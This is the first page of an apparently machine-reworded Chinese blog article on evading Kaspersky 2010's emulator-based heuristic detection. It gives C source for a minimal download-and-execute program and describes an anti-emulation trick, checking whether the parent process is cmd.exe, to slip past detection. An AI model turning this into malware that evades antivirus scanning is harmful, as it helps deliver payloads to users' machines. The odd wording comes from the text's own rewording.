卡巴虚拟机启迪式查毒的绕过办法[网络技术]

By dangdang

据我理解在卡巴7中就有虚拟启迪式查毒的功效.国内就有人在BLOG上发表了一篇若何冲破卡巴7的虚拟机启迪式查毒的文章[1].卡巴8和最新的卡巴2010中仍旧具有该功效.卡巴斯基不用我多说了,大家都知道.
我近来在网上查到有人说卡巴斯基是俄罗斯国家科学院合作开辟的,军方和克里姆林宫专用.这个我还真的不清楚了,请谅解我的无知.我先来说下什么是虚拟机启迪式杀毒.

我认为在这里的虚拟机启迪式杀毒应当可以理解为在虚拟机中履行和启迪式杀毒.虚拟机即构造一个虚拟履行环境大概说一个仿真的环境,将病毒等恶意代码在该仿真的环境中运行实现自己脱壳等等.该仿真的环境和用户计算机的真实环境是断绝的.

举个例子:目前的恶意代码都采取加壳为自己供应保护,特别是一些已知病毒的变种.当采取虚拟机履行技术加壳保护的恶意代码仍能被杀毒软件检测到,有本领的读者可以自己实行一下.

启迪式指的是自我发现并推断或断定事物的方法.启迪式杀毒通过解析程序指令的序列大概API函数的调用次序以及其他恶意代码与正常程序的差别等经验和知识的组合来断定能否是恶意代码.这样的启迪式杀毒具有某种人工智能特点.它的长处不用我多说废话,举个例子:Downloader相信大家都知道,最重要的两个API是URLDownloadToFile和ShellExecute(也可以是其他履行一个程序的API).比方,在利用虚拟机启迪式杀毒时,当被查毒程序的API调用序列中呈现URLDownloadToFile大概ShellExecute,又大概不是按照先URLDownloadToFile后ShellExecute的调用次序是不会被报Downloader的.

可以说由于主动防备技术的各种缺陷,目前各杀毒软件厂商已经将虚拟机杀毒和启迪式杀毒作为杀毒业界的追求和摸索的目标.可以预见到在将来几年内杀毒软件将不再会呈现当正常利用系统和软件时频繁弹出主动防备窗口的尴尬.

接下来将通过上面提到的Downloader例子解析下卡巴的虚拟机启迪式查毒的特点,并在最后给出一种大概的绕过办法和演示代码,供各位看官赏玩.

我假定您已经知道什么是Downloader,一个最简单的Downloader是:

#include "stdafx.h"
#include <urlmon.h>
#include <Shellapi.h>
#pragma comment (lib,"Urlmon.lib")

int APIENTRY _tWinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
 TCHAR szFileName[MAX_PATH] = {0};
 URLDownloadToCacheFile(NULL,L"file://c:\\windows\\notepad.exe",szFileName,MAX_PATH,0,NULL);
 ShellExecute(0,L"open",szFileName,NULL,NULL,SW_SHOW);
 return 0;
}
这个程序是利用Visual Studio 2008成立的Win32窗口工程.编译后卡巴2010直接报Downloader.首先利用了之前提到的xyzreg提到的办法,目前在卡巴2010下已经不实用,简单的测试了一下卡巴2010会把自己模拟成explorer.exe.所以查抄父进程能否是explorer.exe的办法不行了,但是假如查抄自己的父进程能否是cmd.exe便可以了.当然这个实用性并不强,因为要求Downloader必须由cmd.exe启动.

[1] [2] [3] [4]  下一页